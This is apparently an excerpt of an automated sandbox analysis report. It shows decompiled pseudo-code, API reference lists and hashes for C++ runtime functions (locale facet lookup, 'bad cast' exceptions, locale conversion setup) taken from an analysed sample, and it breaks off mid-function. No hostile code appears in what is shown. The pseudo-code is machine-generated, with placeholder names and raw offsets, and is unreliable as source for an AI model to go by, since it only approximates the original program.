                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                                                                                                        • Opcode ID: f51be20ae302ea12bd661d7dcf9924b2bfb1dd704e12457a6a10e2975fdb30af
                                                                                                                                                                                                        • Instruction ID: 44e9582298f91dd78c73d7226bc2d4a95d49aa97c317b43de97af70f507a8f29
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f51be20ae302ea12bd661d7dcf9924b2bfb1dd704e12457a6a10e2975fdb30af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F315C719102688BCB14FB50DC92FE9B334BB54304F5481ABE05937695DB386E85CF68
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004039C9 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E004039C9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t29 = __ebx;
				_push(0x14);
				E00406CE9(E00417316, __ebx, __edi, __esi);
				E00403BDD(_t44 - 0x14, 0);
				_t43 =  *0x42a40c; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E0041E070(0x42a49c);
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E0041E0E0( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00403847(__ebx, _t32, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00405099(_t44 - 0x20, "bad cast");
							E00404EFB(_t44 - 0x20, 0x424900);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x42a40c =  *((intOrPtr*)(_t44 - 0x10));
						E0041D490( *((intOrPtr*)(_t44 - 0x10)));
						E00403EA2(_t29, _t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00403C05(_t44 - 0x14);
				return E00406D88(_t41);
			}









                                                                                                                                                                                                        0x004039c9
                                                                                                                                                                                                        0x004039c9
                                                                                                                                                                                                        0x004039d0
                                                                                                                                                                                                        0x004039da
                                                                                                                                                                                                        0x004039df
                                                                                                                                                                                                        0x004039e5
                                                                                                                                                                                                        0x004039ee
                                                                                                                                                                                                        0x004039f1
                                                                                                                                                                                                        0x004039f6
                                                                                                                                                                                                        0x004039fa
                                                                                                                                                                                                        0x004039ff
                                                                                                                                                                                                        0x00403a03
                                                                                                                                                                                                        0x00403a07
                                                                                                                                                                                                        0x00403a0d
                                                                                                                                                                                                        0x00403a13
                                                                                                                                                                                                        0x00403a14
                                                                                                                                                                                                        0x00403a1b
                                                                                                                                                                                                        0x00403a1e
                                                                                                                                                                                                        0x00403a28
                                                                                                                                                                                                        0x00403a36
                                                                                                                                                                                                        0x00403a36
                                                                                                                                                                                                        0x00403a3b
                                                                                                                                                                                                        0x00403a40
                                                                                                                                                                                                        0x00403a46
                                                                                                                                                                                                        0x00403a4c
                                                                                                                                                                                                        0x00403a09
                                                                                                                                                                                                        0x00403a09
                                                                                                                                                                                                        0x00403a09
                                                                                                                                                                                                        0x00403a07
                                                                                                                                                                                                        0x00403a52
                                                                                                                                                                                                        0x00403a59
                                                                                                                                                                                                        0x00403a65

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 004039D0
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004039DA
                                                                                                                                                                                                        • int.LIBCPMTD ref: 004039F1
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 004039FA
                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 00403A14
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403A28
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403A36
                                                                                                                                                                                                        • std::locale::facet::_Incref.LIBCPMTD ref: 00403A46
                                                                                                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 00403A4C
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 577375395-3145022300
                                                                                                                                                                                                        • Opcode ID: 1b99d0ce64b05c955f2e9c456a5a04959443f10303b7cd1ac7d5899b51e4269a
                                                                                                                                                                                                        • Instruction ID: e7e892875609e00dc102675d8b059eefcd2a707b8f49696479be40925adc9a57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b99d0ce64b05c955f2e9c456a5a04959443f10303b7cd1ac7d5899b51e4269a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A018E31A002189BCB05FBA1C812AEE7B38AF44725F50453EF9217B1D1DF7C9A459B9D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004037AA Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E004037AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t29 = __ebx;
				_push(0x14);
				E00406CE9(E00417316, __ebx, __edi, __esi);
				E00403BDD(_t44 - 0x14, 0);
				_t43 =  *0x42a408; // 0x20310d8
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E0041E070("tionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>");
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E0041E0E0( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E004033AB(__ebx, _t32, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00405099(_t44 - 0x20, "bad cast");
							E00404EFB(_t44 - 0x20, 0x424900);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x42a408 =  *((intOrPtr*)(_t44 - 0x10));
						E0041D490( *((intOrPtr*)(_t44 - 0x10)));
						E00403EA2(_t29, _t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00403C05(_t44 - 0x14);
				return E00406D88(_t41);
			}









                                                                                                                                                                                                        0x004037aa
                                                                                                                                                                                                        0x004037aa
                                                                                                                                                                                                        0x004037b1
                                                                                                                                                                                                        0x004037bb
                                                                                                                                                                                                        0x004037c0
                                                                                                                                                                                                        0x004037c6
                                                                                                                                                                                                        0x004037cf
                                                                                                                                                                                                        0x004037d2
                                                                                                                                                                                                        0x004037d7
                                                                                                                                                                                                        0x004037db
                                                                                                                                                                                                        0x004037e0
                                                                                                                                                                                                        0x004037e4
                                                                                                                                                                                                        0x004037e8
                                                                                                                                                                                                        0x004037ee
                                                                                                                                                                                                        0x004037f4
                                                                                                                                                                                                        0x004037f5
                                                                                                                                                                                                        0x004037fc
                                                                                                                                                                                                        0x004037ff
                                                                                                                                                                                                        0x00403809
                                                                                                                                                                                                        0x00403817
                                                                                                                                                                                                        0x00403817
                                                                                                                                                                                                        0x0040381c
                                                                                                                                                                                                        0x00403821
                                                                                                                                                                                                        0x00403827
                                                                                                                                                                                                        0x0040382d
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037e8
                                                                                                                                                                                                        0x00403833
                                                                                                                                                                                                        0x0040383a
                                                                                                                                                                                                        0x00403846

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 004037B1
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004037BB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 004037D2
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 004037DB
                                                                                                                                                                                                        • ctype.LIBCPMT ref: 004037F5
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403809
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403817
                                                                                                                                                                                                        • std::locale::facet::_Incref.LIBCPMTD ref: 00403827
                                                                                                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0040382D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 2535038987-3145022300
                                                                                                                                                                                                        • Opcode ID: 2f379a3135379599bececbbe14fc956e1e7577e9d51a0fe4c8d91f79dca6e05d
                                                                                                                                                                                                        • Instruction ID: 8d811c5e464190f9aeb22aac56cf9dcb062bf5623305d593723e8a90ca7da102
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f379a3135379599bececbbe14fc956e1e7577e9d51a0fe4c8d91f79dca6e05d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30018275A0021897CB04FBA1D8426EE7638AF84725F50452EF811772D1CF7C9A41D799
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041FAB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041FAB0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403BDD( &_v16, 0);
				_t27 =  *0x42a3f8; // 0x0
				_v20 = _t27;
				_v12 = E0041E070(0x42a400);
				_v8 = E0041E0E0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E0041FB80(__ebx, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x42a3f8 = _v20;
							_v24 = _v20;
							E0041D490(_v24);
							E0041E0C0(_v24);
						} else {
							E00405099( &_v36, "bad cast");
							E00404EFB( &_v36, 0x424900);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403C05( &_v16);
				return _v40;
			}












                                                                                                                                                                                                        0x0041fabb
                                                                                                                                                                                                        0x0041fac0
                                                                                                                                                                                                        0x0041fac5
                                                                                                                                                                                                        0x0041fad2
                                                                                                                                                                                                        0x0041fae1
                                                                                                                                                                                                        0x0041fae8
                                                                                                                                                                                                        0x0041faf0
                                                                                                                                                                                                        0x0041fb0d
                                                                                                                                                                                                        0x0041fb2f
                                                                                                                                                                                                        0x0041fb35
                                                                                                                                                                                                        0x0041fb3e
                                                                                                                                                                                                        0x0041fb44
                                                                                                                                                                                                        0x0041fb4c
                                                                                                                                                                                                        0x0041fb0f
                                                                                                                                                                                                        0x0041fb17
                                                                                                                                                                                                        0x0041fb25
                                                                                                                                                                                                        0x0041fb25
                                                                                                                                                                                                        0x0041faf2
                                                                                                                                                                                                        0x0041faf5
                                                                                                                                                                                                        0x0041faf5
                                                                                                                                                                                                        0x0041faf0
                                                                                                                                                                                                        0x0041fb54
                                                                                                                                                                                                        0x0041fb5a
                                                                                                                                                                                                        0x0041fb65

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041FABB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 0041FACD
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0041FADC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                                        • String ID: bad cast$oA
                                                                                                                                                                                                        • API String ID: 3702371321-509890539
                                                                                                                                                                                                        • Opcode ID: b92cb2168fb3446b85d832f927bc3fb1ce10e8a3794336824a81f52de582357c
                                                                                                                                                                                                        • Instruction ID: d0c8af13bd39b524b62c7db2545636355969af438c318e7b6533179ef788dd55
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b92cb2168fb3446b85d832f927bc3fb1ce10e8a3794336824a81f52de582357c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B218474E04218DBCB04EFA5D851AEEB7B0FF48304F20456EE815B7291DB786E85CB99
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041DFB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041DFB0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403BDD( &_v16, 0);
				_t27 =  *0x42a3f4; // 0x0
				_v20 = _t27;
				_v12 = E0041E070(0x42a3fc);
				_v8 = E0041E0E0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E0041E1A0(__ebx, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x42a3f4 = _v20;
							_v24 = _v20;
							E0041D490(_v24);
							E0041E0C0(_v24);
						} else {
							E00405099( &_v36, "bad cast");
							E00404EFB( &_v36, 0x424900);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403C05( &_v16);
				return _v40;
			}












                                                                                                                                                                                                        0x0041dfbb
                                                                                                                                                                                                        0x0041dfc0
                                                                                                                                                                                                        0x0041dfc5
                                                                                                                                                                                                        0x0041dfd2
                                                                                                                                                                                                        0x0041dfe1
                                                                                                                                                                                                        0x0041dfe8
                                                                                                                                                                                                        0x0041dff0
                                                                                                                                                                                                        0x0041e00d
                                                                                                                                                                                                        0x0041e02f
                                                                                                                                                                                                        0x0041e035
                                                                                                                                                                                                        0x0041e03e
                                                                                                                                                                                                        0x0041e044
                                                                                                                                                                                                        0x0041e04c
                                                                                                                                                                                                        0x0041e00f
                                                                                                                                                                                                        0x0041e017
                                                                                                                                                                                                        0x0041e025
                                                                                                                                                                                                        0x0041e025
                                                                                                                                                                                                        0x0041dff2
                                                                                                                                                                                                        0x0041dff5
                                                                                                                                                                                                        0x0041dff5
                                                                                                                                                                                                        0x0041dff0
                                                                                                                                                                                                        0x0041e054
                                                                                                                                                                                                        0x0041e05a
                                                                                                                                                                                                        0x0041e065

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041DFBB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 0041DFCD
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0041DFDC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 3702371321-3145022300
                                                                                                                                                                                                        • Opcode ID: 0a9efcb7157f00852eec1acc81a28a4754c2fb49d9e04a770c3060e3bc60227d
                                                                                                                                                                                                        • Instruction ID: 107bd17a98ac46b6add300a843c84dd22db423041bf38a5926e6d7d72c70b845
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a9efcb7157f00852eec1acc81a28a4754c2fb49d9e04a770c3060e3bc60227d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 382142B4E00119DBCB04DFA5D851AEEB7B4FF48304F10456EE815B7291DB785E80CB99
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041FE40 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                                        			E0041FE40(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char** _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				char _t71;
				void* _t78;
				void* _t116;
				intOrPtr _t120;

				_push(0xffffffff);
				_push(E00420180);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				_push(__ecx);
				_push(_t78);
				_push(_t116);
				_v20 = _t120 - 0x48;
				_v92 = __ecx;
				_v24 = E00420000(_a4);
				 *((intOrPtr*)(_v92 + 8)) = 0;
				 *((intOrPtr*)(_v92 + 0x10)) = 0;
				 *((intOrPtr*)(_v92 + 0x14)) = 0;
				_v8 = 0;
				_push(E0041FE10(_a4, _v92,  &_v32));
				_push(0);
				 *((intOrPtr*)(_v92 + 8)) = E00420030(_t78, _v24[2], _t116, __eflags, _v24[2]);
				_push(E0041FE10(_a4,  &_v40,  &_v40));
				_push(0);
				 *((intOrPtr*)(_v92 + 0x10)) = E00420030(_t78,  &_v40, _t116, __eflags, E00420010(_a4));
				_push(E0041FE10(_a4,  &_v48,  &_v48));
				_push(0);
				 *((intOrPtr*)(_v92 + 0x14)) = E00420030(_t78,  &_v48, _t116, __eflags, E00420020(_a4));
				_v8 = 0xffffffff;
				_push(E0041FE10(_a4,  &_v56,  &_v56));
				_push(0);
				 *((char*)(_v92 + 0xc)) = E0041FB70( *( *_v24) & 0x000000ff);
				_push(E0041FE10(_a4,  &_v64,  &_v64));
				_push(0);
				_t71 = E0041FB70( *(_v24[1]) & 0x000000ff);
				 *((char*)(_v92 + 0xd)) = _t71;
				_t113 = _a8 & 0x000000ff;
				_t131 = _a8 & 0x000000ff;
				if((_a8 & 0x000000ff) != 0) {
					_push(E0041FE10(_a4, _t113,  &_v72));
					_push(0);
					 *((intOrPtr*)(_v92 + 8)) = E00420030(_t78, _t113, _t116, _t131, 0x4219c0);
					_push(E0041FE10(_a4,  &_v80,  &_v80));
					_push(0);
					 *((char*)(_v92 + 0xc)) = E0041FB70(0x2e);
					_push(E0041FE10(_a4,  &_v88,  &_v88));
					_push(0);
					_t71 = E0041FB70(0x2c);
					 *((char*)(_v92 + 0xd)) = _t71;
				}
				 *[fs:0x0] = _v16;
				return _t71;
			}






















                                                                                                                                                                                                        0x0041fe43
                                                                                                                                                                                                        0x0041fe45
                                                                                                                                                                                                        0x0041fe50
                                                                                                                                                                                                        0x0041fe51
                                                                                                                                                                                                        0x0041fe58
                                                                                                                                                                                                        0x0041fe5c
                                                                                                                                                                                                        0x0041fe5e
                                                                                                                                                                                                        0x0041fe5f
                                                                                                                                                                                                        0x0041fe62
                                                                                                                                                                                                        0x0041fe6d
                                                                                                                                                                                                        0x0041fe73
                                                                                                                                                                                                        0x0041fe7d
                                                                                                                                                                                                        0x0041fe87
                                                                                                                                                                                                        0x0041fe8e
                                                                                                                                                                                                        0x0041fea1
                                                                                                                                                                                                        0x0041fea2
                                                                                                                                                                                                        0x0041feb6
                                                                                                                                                                                                        0x0041fec5
                                                                                                                                                                                                        0x0041fec6
                                                                                                                                                                                                        0x0041fedc
                                                                                                                                                                                                        0x0041feeb
                                                                                                                                                                                                        0x0041feec
                                                                                                                                                                                                        0x0041ff02
                                                                                                                                                                                                        0x0041ff25
                                                                                                                                                                                                        0x0041ff38
                                                                                                                                                                                                        0x0041ff39
                                                                                                                                                                                                        0x0041ff4f
                                                                                                                                                                                                        0x0041ff5e
                                                                                                                                                                                                        0x0041ff5f
                                                                                                                                                                                                        0x0041ff6b
                                                                                                                                                                                                        0x0041ff76
                                                                                                                                                                                                        0x0041ff79
                                                                                                                                                                                                        0x0041ff7d
                                                                                                                                                                                                        0x0041ff7f
                                                                                                                                                                                                        0x0041ff8d
                                                                                                                                                                                                        0x0041ff8e
                                                                                                                                                                                                        0x0041ffa0
                                                                                                                                                                                                        0x0041ffaf
                                                                                                                                                                                                        0x0041ffb0
                                                                                                                                                                                                        0x0041ffbf
                                                                                                                                                                                                        0x0041ffce
                                                                                                                                                                                                        0x0041ffcf
                                                                                                                                                                                                        0x0041ffd3
                                                                                                                                                                                                        0x0041ffde
                                                                                                                                                                                                        0x0041ffde
                                                                                                                                                                                                        0x0041ffe4
                                                                                                                                                                                                        0x0041fff1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00420000: _localeconv.LIBCMT ref: 00420007
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FE9C
                                                                                                                                                                                                          • Part of subcall function 00420030: _strlen.LIBCMT ref: 0042003A
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FEC0
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FEE6
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF33
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF59
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF88
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FFAA
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FFC9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3869368768-0
                                                                                                                                                                                                        • Opcode ID: 74d9d860099ca41ca6b69cba45c40580c8fad3b86d53f1f8a4a7349583e89daf
                                                                                                                                                                                                        • Instruction ID: 4757c36e0059387177324bbf1eeb6407ba96520becbf9860092ef7226653732a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74d9d860099ca41ca6b69cba45c40580c8fad3b86d53f1f8a4a7349583e89daf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 755192B4A00244AFD704DF91D851FAEBB75AF84744F10812EF8095F393DB366A5ACB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00407F01 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00407F01(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x424eb8);
				E0040D294(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00404BF1(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040B6F6(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040B6F6(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0040B6F6(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
